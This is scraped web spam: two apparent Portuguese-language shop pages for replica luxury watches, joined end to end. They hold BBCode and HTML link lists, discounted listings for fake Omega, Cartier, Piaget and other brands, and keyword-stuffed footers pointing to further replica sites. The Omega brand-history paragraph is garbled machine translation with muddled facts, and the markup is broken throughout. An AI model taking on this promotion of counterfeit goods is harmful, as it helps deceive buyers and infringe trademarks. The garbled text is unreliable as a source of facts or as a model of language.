[url=http://www.gmbtel.cn/pt/rel%C3%B3gios-omega-rel%C3%B3gios-especiais-c-136_223_229.html]Relógios Especiais[/url] [url=http://www.gmbtel.cn/pt/rel%C3%B3gios-omega-rel%C3%B3gios-ol%C3%ADmpico-c-136_223_226.html]Relógios Olímpico[/url] [url=http://www.gmbtel.cn/pt/rel%C3%B3gios-omega-seamaster-c-136_223_224.html]Seamaster[/url] [url=http://www.gmbtel.cn/pt/rel%C3%B3gios-omega-speedmaster-c-136_223_225.html]Speedmaster[/url] [url=http://www.gmbtel.cn/pt/rel%C3%B3gios-omega-outras-s%C3%A9ries-c-136_223_230.html]Outras séries[/url] [url=http://www.gmbtel.cn/pt/mens-rel%C3%B3gios-rel%C3%B3gios-rolex-c-136_263.html]Relógios Rolex[/url] [url=http://www.gmbtel.cn/pt/mens-rel%C3%B3gios-tag-heuer-rel%C3%B3gios-c-136_277.html]TAG Heuer Relógios[/url] [url=http://www.gmbtel.cn/pt/mens-rel%C3%B3gios-tudor-rel%C3%B3gios-c-136_289.html]Tudor Relógios[/url] [url=http://www.gmbtel.cn/pt/mens-rel%C3%B3gios-vacheron-constantin-c-136_301.html]Vacheron Constantin[/url] [url=http://www.gmbtel.cn/pt/rel%C3%B3gios-casal-c-419.html]Relógios casal[/url] [url=http://www.gmbtel.cn/pt/senhoras-rel%C3%B3gios-c-310.html]Senhoras Relógios[/url] Destaques - [url=http://www.gmbtel.cn/pt/featured_products.html] [mais][/url] [url=http://www.gmbtel.cn/pt/a-r%C3%A9plica-piaget-limelightrel%C3%B3gio-s%C3%A9rie-g0a30097-sra-rel%C3%B3gio-quartz-p-318.html][img]http://www.gmbtel.cn/pt/images/_small//watches_family_/Earl/The-Earl-LIMELIGHT-watch-series-G0A30097-Ms.jpg[/img]A réplica piaget LIMELIGHT-relógio série G0A30097 Sra. relógio Quartz[/url] [url=http://www.gmbtel.cn/pt/a-r%C3%A9plica-piaget-limelightrel%C3%B3gio-s%C3%A9rie-g0a30097-sra-rel%C3%B3gio-quartz-p-318.html]A réplica piaget LIMELIGHT-relógio série G0A30097 Sra. relógio Quartz[/url]$285.16 $241.00 Poupe: 15% menos [url=http://www.gmbtel.cn/pt/replica-omega-de-ville-42568342055002-rel%C3%B3gios-mec%C3%A2nicos-sra-p-1004.html][img]http://www.gmbtel.cn/pt/images/_small//watches_family_/Omega/Omega-De-Ville-425-68-34-20-55-002-Ms-mechanical.jpg[/img]Replica Omega - De Ville 425.68.34.20.55.002 relógios mecânicos Sra.[/url] [url=http://www.gmbtel.cn/pt/replica-omega-de-ville-42568342055002-rel%C3%B3gios-mec%C3%A2nicos-sra-p-1004.html]Replica Omega - De Ville 425.68.34.20.55.002 relógios mecânicos Sra.[/url]$274.71 $246.00 Poupe: 10% menos [url=http://www.gmbtel.cn/pt/replica-cartiertonneau-we400131-rel%C3%B3gio-ladies-mec%C3%A2nica-p-4033.html][img]http://www.gmbtel.cn/pt/images/_small//watches_family_/Female-form/Cartier-Tonneau-WE400131-Ladies-mechanical-watch.jpg[/img]Replica Cartier-Tonneau WE400131 relógio Ladies mecânica[/url] [url=http://www.gmbtel.cn/pt/replica-cartiertonneau-we400131-rel%C3%B3gio-ladies-mec%C3%A2nica-p-4033.html]Replica Cartier-Tonneau WE400131 relógio Ladies mecânica[/url]$293.66 $251.00 Poupe: 15% menos [url=http://www.gmbtel.cn/pt/]Home[/url] :: [url=http://www.gmbtel.cn/pt/mens-rel%C3%B3gios-c-136.html]Mens Relógios[/url] :: [url=http://www.gmbtel.cn/pt/mens-rel%C3%B3gios-rel%C3%B3gios-omega-c-136_223.html]Relógios Omega[/url] :: [url=http://www.gmbtel.cn/pt/rel%C3%B3gios-omega-speedmaster-c-136_223_225.html]Speedmaster[/url] :: Réplica relógio Omega Omega Speedmaster-323.21.40.44.01.001 homens mecânica .jqzoom{ float:left; position:relative; padding:0px; cursor:pointer; width:301px; height:301px; } [url=http://www.gmbtel.cn/pt/r%C3%A9plica-rel%C3%B3gio-omega-omega-speedmaster32321404401001-homens-mec%C3%A2nica-p-7490.html][img]http://www.gmbtel.cn/pt/images//watches_family2_/Male-Table/OMEGA-OMEGA-Speedmaster-323-21-40-44-01-001-men-s.jpg[/img]Réplica relógio Omega Omega Speedmaster-323.21.40.44.01.001 homens mecânica[/url] Réplica relógio Omega Omega Speedmaster-323.21.40.44.01.001 homens mecânica $259.62 $213.00 Poupe: 18% menos Adicionar ao Carrinho de Compras: Description [/b] Série Speedmaster Estilo Os modelos masculinos Movimento Movimento mecânico automático Modelo movimento Omega 3606 Caso Aço - vermelho e caso, o exemplar de cor de ouro Tamanho 40 milímetros Espessura 15 milímetros Coroa Comum Parte inferior da tabela Não volta através Espelho de mesa Cópia cristal de safira de vidro Discar Preto Pulseira Pulseira de aço inoxidável Cor Correia Prata Fecho Geral À prova d'água 100 m Pacote Caixa de presente. Função Semana - exibição de data, função cronógrafo, pelo funcionário Observatório suíço certificado disco contagem pequeno segundo, tacômetro Lançamento do Ano - [b]【História Brand] [/b]Em 1848, a Confederação Suíça nasceu, começou Louis Brandt (Louis Brandt) e La Chaux-de-Fonds (La Chaux-de-Fonds) o trabalho de montagem de relógios. 1880, filhos, Louis Brandt, Louis-Paul e Csar deslocalização planta a mão de obra adequada, rica em recursos e Bill transporte conveniente (Bienne). Desde então, o uso da produção mecanizada, peças de um padrão unificado, ea introdução de uma nova divisão do sistema de trabalho, o trabalho de montagem, instalou uma sofisticada e precisa, de alta qualidade e com preços razoáveis ​​relógios. O mundo famoso Omega 19 foi publicado em 1894, o movimento não só se tornou um símbolo de excelência, a empresa também daí o nome "Omega". Desde aquela época, Omega-se a vanguarda da indústria de relógios com sua tecnologia avançada relojoaria, até 150 anos de idade. Cento e cinquenta anos, Omega colocou firmemente no mundo da relojoaria posição pioneira, lançou um feito notável. Feira Mundial de 1900, em Paris. Sob a Torre Eiffel, a série de estilo Omega pela sua excelente performance avaliadas por um comitê internacional recebeu a maior honra, a fama do templo grego (templo grego) é uma das mesa pura Copiar ouro esculpida. No esporte, Omega é os Jogos Olímpicos (incluindo requerem projeto competição extremamente preciso natação) e realizada nos Estados Unidos, Canadá, Austrália, Japão equipa automobilismo fez Championship (CART) especificar dispositivos de tempo. Em termos de tecnologia e design, não Omega só tem inúmeros registros precisos e excelente design, o primeiro de uma série de tecnologias, tais como a fabricação de primeiro do mundo relógios centro turbilhão. Omega mundo, apenas relógios de alta qualidade superior antes de mostrar alto nível janelas em mais de 130 países. Celebridade mais de relógios para se orgulhar, American supermodelo Cindy Crawford (Cindy Crawford), 007 Pierce Brosnan (Pierce Brosnan), o carro rei Michael Schumacher (Michael Schumacher) e suíço de tênis princesa Mary Tina Hingis (Martina Hingis) escolher para vestir Omega. [url=http://www.gmbtel.cn/pt/images//watches_family2_/Male-Table/OMEGA-OMEGA-Speedmaster-323-21-40-44-01-001-men-s.jpg][img]http://www.gmbtel.cn/pt/images//watches_family2_/Male-Table/OMEGA-OMEGA-Speedmaster-323-21-40-44-01-001-men-s.jpg[/img]/watches_family2_/Male-Table/OMEGA-OMEGA-Speedmaster-323-21-40-44-01-001-men-s.jpg[/url] [url=http://www.gmbtel.cn/pt/images//watches_family2_/Male-Table/OMEGA-OMEGA-Speedmaster-323-21-40-44-01-001-men-s-1.jpg][img]http://www.gmbtel.cn/pt/images//watches_family2_/Male-Table/OMEGA-OMEGA-Speedmaster-323-21-40-44-01-001-men-s-1.jpg[/img]/watches_family2_/Male-Table/OMEGA-OMEGA-Speedmaster-323-21-40-44-01-001-men-s-1.jpg[/url] [url=http://www.gmbtel.cn/pt/images//watches_family2_/Male-Table/OMEGA-OMEGA-Speedmaster-323-21-40-44-01-001-men-s-2.jpg][img]http://www.gmbtel.cn/pt/images//watches_family2_/Male-Table/OMEGA-OMEGA-Speedmaster-323-21-40-44-01-001-men-s-2.jpg[/img]/watches_family2_/Male-Table/OMEGA-OMEGA-Speedmaster-323-21-40-44-01-001-men-s-2.jpg[/url] [url=http://www.gmbtel.cn/pt/images//watches_family2_/Male-Table/OMEGA-OMEGA-Speedmaster-323-21-40-44-01-001-men-s-3.jpg][img]http://www.gmbtel.cn/pt/images//watches_family2_/Male-Table/OMEGA-OMEGA-Speedmaster-323-21-40-44-01-001-men-s-3.jpg[/img]/watches_family2_/Male-Table/OMEGA-OMEGA-Speedmaster-323-21-40-44-01-001-men-s-3.jpg[/url]<a target="_blank" href="http://www.gmbtel.cn/pt/images//watches_family2_/Male-Table/OMEGA-OMEGA-Speedmaster-323-21-40-44-01-001-men-s-4.jpg"><img itemprop="image" src="http://www.gmbtel.cn/pt/images//watches_family2_/Male-Table/OMEGA-OMEGA-Speedmaster-323-21-40-44-01-001-men-s-4.jpg" width=700px alt="/watches_family2_/Male-Table/OMEGA-OMEGA-Speedmaster-323-21-40-44-01-001-men-s-4.jpg"/></a>[url=http://www.gmbtel.cn/pt/images//watches_family2_/Male-Table/OMEGA-OMEGA-Speedmaster-323-21-40-44-01-001-men-s-5.jpg][img]http://www.gmbtel.cn/pt/images//watches_family2_/Male-Table/OMEGA-OMEGA-Speedmaster-323-21-40-44-01-001-men-s-5.jpg[/img]/watches_family2_/Male-Table/OMEGA-OMEGA-Speedmaster-323-21-40-44-01-001-men-s-5.jpg[/url] Referência: 11244 Related Products <a href="http://www.gmbtel.cn/pt/replica-omega-speedmaster-31133425001001-rel%C3%B3gio-dos-homens-mec%C3%A2nica-p-7760.html"><img src="http://www.gmbtel.cn/pt/images/_small//watches_family2_/Male-Table/Omega-Speedmaster-311-33-42-50-01-001-men-s.jpg" alt="Replica Omega - Speedmaster 311.33.42.50.01.001 relógio dos homens mecânica" title=" Replica Omega - Speedmaster 311.33.42.50.01.001 relógio dos homens mecânica " width="160" height="160" /></a>[url=http://www.gmbtel.cn/pt/replica-omega-speedmaster-31133425001001-rel%C3%B3gio-dos-homens-mec%C3%A2nica-p-7760.html]Replica Omega - Speedmaster 311.33.42.50.01.001 relógio dos homens mecânica[/url] [url=http://www.gmbtel.cn/pt/replica-omega-speedmaster-38823137-rel%C3%B3gio-mec%C3%A2nico-dos-homens-p-7772.html][img]http://www.gmbtel.cn/pt/images/_small//watches_family2_/Male-Table/Omega-Speedmaster-3882-31-37-Men-s-mechanical.jpg[/img]Replica Omega - Speedmaster 3882.31.37 relógio mecânico dos homens[/url]<a href="http://www.gmbtel.cn/pt/replica-omega-speedmaster-38823137-rel%C3%B3gio-mec%C3%A2nico-dos-homens-p-7772.html">Replica Omega - Speedmaster 3882.31.37 relógio mecânico dos homens</a> [url=http://www.gmbtel.cn/pt/replica-omega-speedmaster-32110445001001-rel%C3%B3gio-dos-homens-mec%C3%A2nica-p-7761.html][img]http://www.gmbtel.cn/pt/images/_small//watches_family2_/Male-Table/Omega-Speedmaster-321-10-44-50-01-001-men-s.jpg[/img]Replica Omega - Speedmaster 321.10.44.50.01.001 relógio dos homens mecânica[/url] [url=http://www.gmbtel.cn/pt/replica-omega-speedmaster-32110445001001-rel%C3%B3gio-dos-homens-mec%C3%A2nica-p-7761.html]Replica Omega - Speedmaster 321.10.44.50.01.001 relógio dos homens mecânica[/url] [url=http://www.gmbtel.cn/pt/replica-omega-speedmaster-31130445101001-rel%C3%B3gio-dos-homens-mec%C3%A2nica-p-7562.html][img]http://www.gmbtel.cn/pt/images/_small//watches_family2_/Male-Table/Omega-Speedmaster-311-30-44-51-01-001-men-s.jpg[/img]Replica Omega - Speedmaster 311.30.44.51.01.001 relógio dos homens mecânica[/url]<a href="http://www.gmbtel.cn/pt/replica-omega-speedmaster-31130445101001-rel%C3%B3gio-dos-homens-mec%C3%A2nica-p-7562.html">Replica Omega - Speedmaster 311.30.44.51.01.001 relógio dos homens mecânica</a> [url=http://www.gmbtel.cn/pt/index.php?main_page=product_reviews_write&amp;products_id=7490][img]http://www.gmbtel.cn/pt/includes/templates/polo/buttons/portugues/button_write_review.gif[/img]Escrever Comentário[/url] \ n [url=http://www.gmbtel.cn/pt/index.php]Início[/url] [url=http://www.gmbtel.cn/pt/index.php?main_page=shippinginfo]Remessa[/url] [url=http://www.gmbtel.cn/pt/index.php?main_page=Payment_Methods]Atacado[/url] [url=http://www.gmbtel.cn/pt/index.php?main_page=shippinginfo]Seguimento da Encomenda[/url] [url=http://www.gmbtel.cn/pt/index.php?main_page=Coupons]Cupons[/url] [url=http://www.gmbtel.cn/pt/index.php?main_page=Payment_Methods]Formas de Pagamento[/url] [url=http://www.gmbtel.cn/pt/index.php?main_page=contact_us]Contate-nos[/url] [url=http://www.topperfectwatches.com/pt/]Replica Omega[/url] [url=http://www.topperfectwatches.com/pt/]Patek Philippe réplica[/url] [url=http://www.topperfectwatches.com/pt/]Replica Rolex[/url] [url=http://www.topperfectwatches.com/pt/]Réplica[/url] [url=http://www.topperfectwatches.com/pt/]Breitling[/url] [url=http://www.gmbtel.cn/pt/r%C3%A9plica-rel%C3%B3gio-omega-omega-speedmaster32321404401001-homens-mec%C3%A2nica-p-7490.html][/url] Copyright © 2012-2014 Todos os direitos reservados. [b][url=http://www.gmbtel.cn/pt/marca-rel%C3%B3gios-de-luxo-c-38.html]Relógios de marca de luxo Paul[/url][/b] [b][url=http://www.gmbtel.cn/pt/marca-rel%C3%B3gios-de-luxo-c-38.html]Relógios relógios de marca de luxo[/url][/b]
[b][url=http://www.bestreplicawatches.net/pt/alange-sohne-rel%C3%B3gios-c-268.html]A.<strong><a href="http://www.bestreplicawatches.net/pt/alange-sohne-rel%C3%B3gios-c-268.html">A.Lange u0026 Söhne relógios</a></strong><br> <strong><a href="http://www.bestreplicawatches.net/pt/alange-sohne-rel%C3%B3gios-c-268.html">Replica A. Lange u0026 Söhne relógios</a></strong><br>
[b]<a href="http://www.bestreplicawatches.net/pt/">Comprar relógios</a>[/b] | [b][url=http://www.bestreplicawatches.net/pt/]Mens relógios[/url][/b] | [b][url=http://www.bestreplicawatches.net/pt/]Relógios[/url][/b] Réplicas relógios Cartier, Fake relógios Cartier, relógios Cartier, relógios baratos Cartier, Desconto relógios Cartier, Comprar Cartier Relógios language: [url=http://www.bestreplicawatches.net/de/] [img]http://www.bestreplicawatches.net/pt/langimg/gericon.gif[/img]Deutsch[/url] [url=http://www.bestreplicawatches.net/fr/] [img]http://www.bestreplicawatches.net/pt/langimg/fricon.gif[/img]Français[/url] [url=http://www.bestreplicawatches.net/it/] [img]http://www.bestreplicawatches.net/pt/langimg/iticon.gif[/img]italiano[/url] [url=http://www.bestreplicawatches.net/es/] [img]http://www.bestreplicawatches.net/pt/langimg/esicon.gif[/img]Español[/url] [url=http://www.bestreplicawatches.net/pt/] [img]http://www.bestreplicawatches.net/pt/langimg/pticon.gif[/img]Português[/url] [url=http://www.bestreplicawatches.net/jp/] [img]http://www.bestreplicawatches.net/pt/langimg/jpicon.gif[/img]日本語[/url] [url=http://www.bestreplicawatches.net/ru/] [img]http://www.bestreplicawatches.net/pt/langimg/ruicon.gif[/img]russian[/url] [url=http://www.bestreplicawatches.net/ar/] [img]http://www.bestreplicawatches.net/pt/langimg/aricon.gif[/img]arabic[/url] <a href="http://www.bestreplicawatches.net/no/"> <img src="http://www.bestreplicawatches.net/pt/langimg/noicon.gif" alt="norwegian" title=" norwegian " height="15" width="24"></a> [url=http://www.bestreplicawatches.net/sv/] [img]http://www.bestreplicawatches.net/pt/langimg/svicon.gif[/img]swedish[/url] [url=http://www.bestreplicawatches.net/da/] [img]http://www.bestreplicawatches.net/pt/langimg/daicon.gif[/img]danish[/url] [url=http://www.bestreplicawatches.net/nl/] [img]http://www.bestreplicawatches.net/pt/langimg/nlicon.gif[/img]Nederlands[/url] [url=http://www.bestreplicawatches.net/fi/] [img]http://www.bestreplicawatches.net/pt/langimg/fiicon.gif[/img]finland[/url] [url=http://www.bestreplicawatches.net/ie/] [img]http://www.bestreplicawatches.net/pt/langimg/gaicon.gif[/img]ireland[/url] [url=http://www.bestreplicawatches.net/] [img]http://www.bestreplicawatches.net/pt/langimg/icon.gif[/img]English[/url] Welcome! [url=http://www.bestreplicawatches.net/pt/index.php?main_page=login]Sign In[/url] or [url=http://www.bestreplicawatches.net/pt/index.php?main_page=create_account]Register[/url] [url=http://www.bestreplicawatches.net/pt/index.php?main_page=shopping_cart][img]http://www.bestreplicawatches.net/pt/includes/templates/polo/images/spacer.gif[/img]Powered by Zen Cart :: The Art of E-Commerce[/url]Your cart is empty [url=http://www.bestreplicawatches.net/pt/][img]http://www.bestreplicawatches.net/pt/includes/templates/polo/images/logo.gif[/img]Powered by Zen Cart :: The Art of E-Commerce[/url] [url=http://www.bestreplicawatches.net/pt/cartier-watches-c-482.html][img]http://www.bestreplicawatches.net/pt/includes/templates/polo/images/head_back.png[/img]Calibre Cartier[/url] <a href="http://www.bestreplicawatches.net/pt/index.php">Casa</a> [url=http://www.bestreplicawatches.net/pt/cartier-watches-c-482.html]cartier Replica Watches[/url] [url=http://www.bestreplicawatches.net/pt/omega-watches-c-203.html]relógios réplica OMEGA[/url] [url=http://www.bestreplicawatches.net/pt/patek-watches-c-173.html]réplica relógios Patek[/url] Categories [url=http://www.bestreplicawatches.net/pt/rel%C3%B3gios-omega-c-203.html]Relógios Omega[/url] [url=http://www.bestreplicawatches.net/pt/rel%C3%B3gios-rolex-c-630.html]Relógios Rolex[/url] [url=http://www.bestreplicawatches.net/pt/alange-sohne-rel%C3%B3gios-c-268.html]A.Lange & Sohne Relógios[/url] [url=http://www.bestreplicawatches.net/pt/audemars-piguet-rel%C3%B3gios-c-259.html]Audemars Piguet Relógios[/url] [url=http://www.bestreplicawatches.net/pt/bell-ross-rel%C3%B3gios-c-465.html]Bell & Ross Relógios[/url] [url=http://www.bestreplicawatches.net/pt/breguet-rel%C3%B3gios-c-280.html]Breguet Relógios[/url] [url=http://www.bestreplicawatches.net/pt/breitling-c-469.html]Breitling[/url] [url=http://www.bestreplicawatches.net/pt/cartier-rel%C3%B3gios-c-482.html]Cartier Relógios[/url] [url=http://www.bestreplicawatches.net/pt/cartier-rel%C3%B3gios-mens-rel%C3%B3gios-c-482_483.html]Mens Relógios[/url] [url=http://www.bestreplicawatches.net/pt/cartier-rel%C3%B3gios-rel%C3%B3gios-de-senhora-c-482_591.html]Relógios de senhora[/url] [url=http://www.bestreplicawatches.net/pt/chopard-rel%C3%B3gios-c-299.html]Chopard Relógios[/url] [url=http://www.bestreplicawatches.net/pt/ferrari-rel%C3%B3gios-c-235.html]Ferrari Relógios[/url] [url=http://www.bestreplicawatches.net/pt/franck-muller-rel%C3%B3gios-c-347.html]Franck Muller Relógios[/url] [url=http://www.bestreplicawatches.net/pt/hamilton-rel%C3%B3gios-c-245.html]Hamilton Relógios[/url] [url=http://www.bestreplicawatches.net/pt/hermes-rel%C3%B3gios-c-92.html]Hermes Relógios[/url] [url=http://www.bestreplicawatches.net/pt/iwc-c-161.html]IWC[/url] [url=http://www.bestreplicawatches.net/pt/jaeger-lecoultre-rel%C3%B3gios-c-501.html]Jaeger LeCoultre Relógios[/url] [url=http://www.bestreplicawatches.net/pt/longines-rel%C3%B3gios-c-1.html]Longines Relógios[/url] <a class="category-top" href="http://www.bestreplicawatches.net/pt/montblanc-rel%C3%B3gios-c-382.html">Montblanc Relógios</a> [url=http://www.bestreplicawatches.net/pt/outras-marcas-c-44.html]Outras Marcas[/url] [url=http://www.bestreplicawatches.net/pt/panerai-rel%C3%B3gios-c-392.html]Panerai Relógios[/url] [url=http://www.bestreplicawatches.net/pt/patek-c-173.html]Patek[/url] [url=http://www.bestreplicawatches.net/pt/piaget-rel%C3%B3gios-c-216.html]Piaget Relógios[/url] [url=http://www.bestreplicawatches.net/pt/rel%C3%B3gios-armani-c-13.html]Relógios Armani[/url] [url=http://www.bestreplicawatches.net/pt/rel%C3%B3gios-porsche-c-408.html]Relógios Porsche[/url] <a class="category-top" href="http://www.bestreplicawatches.net/pt/rel%C3%B3gios-rado-c-413.html">Relógios Rado</a> [url=http://www.bestreplicawatches.net/pt/tag-heuer-rel%C3%B3gios-c-520.html]TAG Heuer Relógios[/url] [url=http://www.bestreplicawatches.net/pt/tissot-rel%C3%B3gios-c-439.html]Tissot Relógios[/url] [url=http://www.bestreplicawatches.net/pt/uboat-watches-c-425.html]U-Boat Watches[/url] <a class="category-top" href="http://www.bestreplicawatches.net/pt/ulysse-nardin-rel%C3%B3gios-c-432.html">Ulysse Nardin Relógios</a> [url=http://www.bestreplicawatches.net/pt/vacheron-constantin-e-c-30.html]Vacheron Constantin e[/url] [url=http://www.bestreplicawatches.net/pt/versace-rel%C3%B3gios-c-435.html]Versace Relógios[/url] [url=http://www.bestreplicawatches.net/pt/]Home[/url] :: Cartier Relógios Cartier Relógios Displaying [b]1[/b] to [b]12[/b] (of [b]53[/b] products) 1[/b] [url=http://www.bestreplicawatches.net/pt/cartier-rel%C3%B3gios-c-482.html?page=2&sort=20a]2[/url] [url=http://www.bestreplicawatches.net/pt/cartier-rel%C3%B3gios-c-482.html?page=3&sort=20a]3[/url] [url=http://www.bestreplicawatches.net/pt/cartier-rel%C3%B3gios-c-482.html?page=4&sort=20a]4[/url] [url=http://www.bestreplicawatches.net/pt/cartier-rel%C3%B3gios-c-482.html?page=5&sort=20a]5[/url] <a href="http://www.bestreplicawatches.net/pt/cartier-rel%C3%B3gios-c-482.html?page=2&sort=20a" title=" Next Page ">[Next &gt;&gt;]</a> <a href="http://www.bestreplicawatches.net/pt/calibre-cartier-p-5268.html"><div style="vertical-align: middle;height:220px"><img src="http://www.bestreplicawatches.net/pt/images//brandswatch0001_/Men-8217-s-Watches/Cartier-Calibre.jpg" alt="Calibre Cartier" title=" Calibre Cartier " width="225" height="220" class="listingProductImage" id="listimg" /></div></a><a href="http://www.bestreplicawatches.net/pt/calibre-cartier-p-5268.html">Calibre Cartier</a>Especificações Marca: Cartier Coleção: Calibre Ref...$208.49 $193.00Save: 7% off[url=http://www.bestreplicawatches.net/pt/calibre-cartier-p-5268.html]... more info[/url] <a href="http://www.bestreplicawatches.net/pt/calibre-cartier-p-5271.html"><div style="vertical-align: middle;height:220px"><img src="http://www.bestreplicawatches.net/pt/images//brandswatch0001_/Men-8217-s-Watches/Cartier-Calibre-10.jpg" alt="Calibre Cartier" title=" Calibre Cartier " width="225" height="220" class="listingProductImage" id="listimg" /></div></a>[url=http://www.bestreplicawatches.net/pt/calibre-cartier-p-5271.html]Calibre Cartier[/url]Especificações Marca: Cartier Coleção: Calibre Ref...$246.93 $212.00Save: 14% off[url=http://www.bestreplicawatches.net/pt/calibre-cartier-p-5271.html]... more info[/url] [url=http://www.bestreplicawatches.net/pt/calibre-cartier-p-5273.html][img]http://www.bestreplicawatches.net/pt/images//brandswatch0001_/Men-8217-s-Watches/Cartier-Calibre-12.jpg[/img]Calibre Cartier[/url]<a href="http://www.bestreplicawatches.net/pt/calibre-cartier-p-5273.html">Calibre Cartier</a>Especificações Marca: Cartier Coleção: Calibre Ref...$261.16 $244.00Save: 7% off[url=http://www.bestreplicawatches.net/pt/calibre-cartier-p-5273.html]... more info[/url] [url=http://www.bestreplicawatches.net/pt/cartier-baignoire-p-5962.html][img]http://www.bestreplicawatches.net/pt/images//brandswatch0001_/Ladies-8217-Watches/Cartier-Baignoire.jpg[/img]Cartier Baignoire[/url] [url=http://www.bestreplicawatches.net/pt/cartier-baignoire-p-5962.html]Cartier Baignoire[/url]Especificações Marca: Cartier Coleção: Camarote Ref...$248.81 $208.00Save: 16% off[url=http://www.bestreplicawatches.net/pt/cartier-baignoire-p-5962.html]... more info[/url] <a href="http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5261.html"><div style="vertical-align: middle;height:220px"><img src="http://www.bestreplicawatches.net/pt/images//brandswatch0001_/Men-8217-s-Watches/Cartier-Ballon-Bleu.jpg" alt="Cartier Ballon Bleu" title=" Cartier Ballon Bleu " width="225" height="220" class="listingProductImage" id="listimg" /></div></a><a href="http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5261.html">Cartier Ballon Bleu</a>Especificações Marca: Cartier Coleção: Ballon Bleu Ref...$295.03 $239.00Save: 19% off[url=http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5261.html]... more info[/url] [url=http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5262.html][img]http://www.bestreplicawatches.net/pt/images//brandswatch0001_/Men-8217-s-Watches/Cartier-Ballon-Bleu-10.jpg[/img]Cartier Ballon Bleu[/url] [url=http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5262.html]Cartier Ballon Bleu[/url]Especificações Marca: Cartier Coleção: Ballon Bleu Ref...$245.16 $220.00Save: 10% off[url=http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5262.html]... more info[/url] [url=http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5263.html][img]http://www.bestreplicawatches.net/pt/images//brandswatch0001_/Men-8217-s-Watches/Cartier-Ballon-Bleu-12.jpg[/img]Cartier Ballon Bleu[/url] [url=http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5263.html]Cartier Ballon Bleu[/url]Especificações Marca: Cartier Coleção: Ballon Bleu Ref...$270.54 $222.00Save: 18% off<a href="http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5263.html">... more info</a> [url=http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5264.html][img]http://www.bestreplicawatches.net/pt/images//brandswatch0001_/Men-8217-s-Watches/Cartier-Ballon-Bleu-14.jpg[/img]Cartier Ballon Bleu[/url]<a href="http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5264.html">Cartier Ballon Bleu</a>Especificações Marca: Cartier Coleção: Ballon Bleu Ref...$240.92 $219.00Save: 9% off[url=http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5264.html]... more info[/url] <a href="http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5265.html"><div style="vertical-align: middle;height:220px"><img src="http://www.bestreplicawatches.net/pt/images//brandswatch0001_/Men-8217-s-Watches/Cartier-Ballon-Bleu-16.jpg" alt="Cartier Ballon Bleu" title=" Cartier Ballon Bleu " width="225" height="220" class="listingProductImage" id="listimg" /></div></a><a href="http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5265.html">Cartier Ballon Bleu</a>Especificações Marca: Cartier Coleção: Ballon Bleu Ref...$259.23 $217.00Save: 16% off[url=http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5265.html]... more info[/url] [url=http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5266.html][img]http://www.bestreplicawatches.net/pt/images//brandswatch0001_/Men-8217-s-Watches/Cartier-Ballon-Bleu-18.jpg[/img]Cartier Ballon Bleu[/url] [url=http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5266.html]Cartier Ballon Bleu[/url]Especificações Marca: Cartier Coleção: Ballon Bleu Ref...$315.46 $258.00Save: 18% off[url=http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5266.html]... more info[/url] [url=http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5267.html][img]http://www.bestreplicawatches.net/pt/images//brandswatch0001_/Men-8217-s-Watches/Cartier-Ballon-Bleu-20.jpg[/img]Cartier Ballon Bleu[/url] [url=http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5267.html]Cartier Ballon Bleu[/url]Especificações Marca: Cartier Coleção: Ballon Bleu Ref...$208.38 $193.00Save: 7% off[url=http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5267.html]... more info[/url] [url=http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5269.html][img]http://www.bestreplicawatches.net/pt/images//brandswatch0001_/Men-8217-s-Watches/Cartier-Ballon-Bleu-22.jpg[/img]Cartier Ballon Bleu[/url] [url=http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5269.html]Cartier Ballon Bleu[/url]Especificações Marca: Cartier Coleção: Ballon Bleu Ref...$241.35 $217.00Save: 10% off[url=http://www.bestreplicawatches.net/pt/cartier-ballon-bleu-p-5269.html]... more info[/url] Displaying [b]1[/b] to [b]12[/b] (of [b]53[/b] products) 1[/b] [url=http://www.bestreplicawatches.net/pt/cartier-rel%C3%B3gios-c-482.html?page=2&sort=20a]2[/url] [url=http://www.bestreplicawatches.net/pt/cartier-rel%C3%B3gios-c-482.html?page=3&sort=20a]3[/url] [url=http://www.bestreplicawatches.net/pt/cartier-rel%C3%B3gios-c-482.html?page=4&sort=20a]4[/url] [url=http://www.bestreplicawatches.net/pt/cartier-rel%C3%B3gios-c-482.html?page=5&sort=20a]5[/url] [url=http://www.bestreplicawatches.net/pt/cartier-rel%C3%B3gios-c-482.html?page=2&sort=20a][Next &gt;&gt;][/url] [url=http://www.bestreplicawatches.net/pt/index.php]Casa[/url] <a href="http://www.bestreplicawatches.net/pt/index.php?main_page=shippinginfo" target="_blank">casa</a> [url=http://www.bestreplicawatches.net/pt/index.php?main_page=Payment_Methods]frete[/url] [url=http://www.bestreplicawatches.net/pt/index.php?main_page=shippinginfo]por atacado[/url] [url=http://www.bestreplicawatches.net/pt/index.php?main_page=Coupons]ordem rastreamento[/url] [url=http://www.bestreplicawatches.net/pt/index.php?main_page=Payment_Methods]cupons[/url] [url=http://www.bestreplicawatches.net/pt/index.php?main_page=contact_us]métodos de pagamento[/url] [url=http://www.topperfectwatches.com/pt/]entre em contato conosco[/url] [url=http://www.topperfectwatches.com/pt/]REPLICA OMEGA[/url] <a href="http://www.topperfectwatches.com/pt/" target="_blank">REPLICA PATEK PHILIPPE</a> [url=http://www.topperfectwatches.com/pt/]REPLICA ROLEX[/url] <a href="http://www.topperfectwatches.com/pt/" target="_blank">REPLICA CARTIER</a> 